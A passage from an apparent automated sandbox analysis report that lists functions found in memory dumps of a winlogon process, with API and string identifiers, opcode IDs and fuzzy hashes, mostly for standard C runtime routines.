                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 05bf48fb40d5b317a8235632c964cef6d02a25c8f7691d3038dd68194b884147
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 51F08C28328FA4A2FA448FDBB90C1196260AB48FD2F18E170EF4A07B58DF3CC485C700
                                                        Function 00000225DC64BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 44bd982de87b7b9a06009664450f2777bab72fc188efb7fa02744482d7f49e87
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 72F09669329F14A1EB108FECE44C3596361EB89766F648259DB6A462F4CF3CC044C740
                                                        Function 00000225DC6A50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: cc4e45ee1de0211bceb984575181e682b35c92b14fcfce5c930bbfc96d3dc94e
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: EA02C836219F9496EB60CB99F49435AB7A0F3C5795F209015EB8E87BA9DF7CC444CB00
                                                        Function 00000225DC6A5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: c0f1102daedf8fd83df05dbad566c9dcb67f0f52cae9f12d02fc669b962d21e9
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: DB61EE3A519F94D6E760CB99E54831AB7E0F388786F209115FA8E87BA8DB7CC554CF00
                                                        Function 00000225DC645710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                        • Instruction ID: 8f9846ecf6cf7499faee6b5ce6658377365f055e4165f45403509503972279d5
                                                        • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                        • Instruction Fuzzy Hash: 6561CD3A51DF94D6E760CB99E44831AB7A0F3C8796F109165EA8E87BA8DB7CC544CF00
                                                        Function 00000225DC6B4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 790992d3fedfbb3f0c19deaeddb177f6f54104038671def6cf99952e65a916c8
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 2711733EE14E7131F66415ECD45D3751243EB783BBF18C624AA7E076D6CA34C841E210
                                                        Function 00000225DC623504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 0f0cd1f3b4902091acada321e62a835e8ba03bea7c675b6eead67c7f9176ca24
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 6B11C63AA60E3131FB6415ECE45D37991C86B58BB6F48C639A97F2E3D6CB34C881C200
                                                        Function 00000225DC683504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 4770082600421d2f4bb53b6383fc8d4b46f38f5b83b98cacefa30fc3353db637
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 4111EC3E6A4E3131FA54D5ECE44D37911906F59F76F48C638A976067DACA78C841C203
                                                        Function 00000225DC654104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: a15945065d89435b6d58080b2ea34464beef53a1596a2d5ce657289fdf07ecc6
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 5911733EA34E7131F67415ECD45D3751151EB783FAF38C6A4A976076D6DA34C841E200
                                                        Function 00000225DC61F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 944570b48e0c60bc5ad5e959f3b97a539a301ff4876b6c2567b65f1bc9dbc55e
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 2961E27E606E6066FE69CBFCE55D32E66A0F785793F54C415EA0A037A4DB34C842C302
                                                        Function 00000225DC67F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: b809d82d10e30da49faebdcfad985b935ab92b62efaa54905c9af04f2a82b3da
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 6761D63E614E60B2FA65DBFCD55CB2A26A0E785742F51CD15EA1A07FE4DB34C842C382
                                                        Function 00000225DC6AAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: aa70c4840d0660077c5495364ee98befc91b92371ab933d55f9a834b1db71008
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 4761BE3B600F949AEB20DFA9D04439D77A0F748B8DF248216EF4A53B99DB38D085CB00
                                                        Function 00000225DC64AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 5ee5bc15fcc7ca4683ce8519a978933ac552fc7779cbca0cf07b2e2c35c6d78e
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 6561CF3B608F94AAEB20DFA9D04439D7BA1F348B8DF148255EF4A17B99DB38C085C700
                                                        Function 00000225DC6AAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 2e3fcafa7e63c7afecd5eb320568e29d6bc18ccae88d7ce5c4c248ffc38c6f0c
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 9C51837A100BA0AAEB74CF99958835D77A0F758B86F34C117EA99C7BD6CB34D451CB00
                                                        Function 00000225DC61A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 4352b4e7d2f757b2eeab07a41cb79b5cce5006a568909e68af21b5ba570d396d
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 9B51C23A105BA0EAEF748F99944835877A0F355B97F28C215EB89C7BD6CB38C451C700
                                                        Function 00000225DC67A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: d8bc5406c68cbc3a3f3e81927d6ca097891e5497fb3224580501911da265d3db
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 7D51E83A104BA0DAEB748FA9944835C77A0F355B96F28E615FB5987FD6CB38D490CB00
                                                        Function 00000225DC64AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: e2a4ec1541559836ceca0d34c116ae26037d4692d9dd8773577d8c71d6944edc
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 9C51C37A10CBA0FAEB748F9A948835977A0F354B86F24C159FA5A47BD7CB38C451C700
                                                        Function 00000225DC618405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 8a2ee0853dea6fc810b70285cdad8afa924fb268fca63da5ab5c18953c58d14e
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 9F51BF3A712A20AAEF94CF99E448B1937A5F358B9FF52C224DE0647788EB34CC41C704
                                                        Function 00000225DC678405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 8bc61f57c5687e7a86239f1075434ff38e81a80eea30d95d659fdd3eaf197c62
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: DD51BF3A711A20AAFB94CF69E448B193795F758B9FF51CA24DA0663BC8EB74CC41C704
                                                        Function 00000225DC6183E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: a13f22b0c5ddbfd73ffef1e451b0b481ee6602808d75d20c911345d57e3c4186
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: A731C03A602B60A6EB64DF5AE84871977A4F748BDFF16C214EE5B47784DB38C940C704
                                                        Function 00000225DC6783E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 7ede24912a818c19e80a806750f1858c6928fd0ae1f237999a321a790690d3dd
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: F731BF3A211B60E6EB54DF69E8487193BA4F748B9AF15CA14EE5A13BC8DB38CD40C704
                                                        Function 00000225DC6B2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 01741f095c584cdd00ba98e3aa790e67a4177efe8c0c1c6c5439ed656a32a405
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: F2D1FF76B14E90A9E712CFA9D44839C7BF2F75479AF108216CF6E97B99DA34C406C340
                                                        Function 00000225DC652058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: bfa2cf39ed762a0c864f02a182d0b99d9a486c982741babc9b475573dd9f7606
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: F7D1F376724E90A9E712CFB9D44839C3BB1F754799F248216CF5E97B99DA34C406C340
                                                        Function 00000225DC6414A4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction ID: 6bfd24914fe268a9eaf32d670607eda920269b08af1813506c338134dac0ed3e
                                                        • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction Fuzzy Hash: E2115E7A524FA0E6E724DFEEA80816977A0FB89F86F148025DB4A53726DE34C451C740
                                                        Function 00000225DC6B2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 0effa0560eecda1315c6bac3784fbf95153408d93820f0ff7fe2030bc37eebda
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: F991D37A710E70A5FB62DFAD94883AD3BE2B704B8BF148109DE1A57A95DF34C486C700
                                                        Function 00000225DC652980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 6d7b5b403a3188d3b4841f9fb94707250acf1a7d2d8579f267c512fad794f412
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 7391D67AB20E70A5F766DFAD94883AD3BA0F754B8AF24C109DE0A57795DB34C486C700
                                                        Function 00000225DC6A7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 6c068aa945f0ac6dafb2ede45e1116f91dfe096492dd73cd30e6c0fcb5e07c68
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: A7111226710F1599EF00CFA8E8593A833A4F75975EF441E25DB6D867A4DF78C1A8C380
                                                        Function 00000225DC6A253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 5f5e41b068d0f293cc7ef7899fb07c4c471cec35d55f3e32321b6d3ba8d92876
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: 0971FB3A280FA166D726DFADD8483AA6794F385B86F648025DD0ED3B89DE35C645C700
                                                        Function 00000225DC64253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 898a99a824d3708835f2c6571b9ade3bad5d2cda467ec0446c5c9970c4b06ed6
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
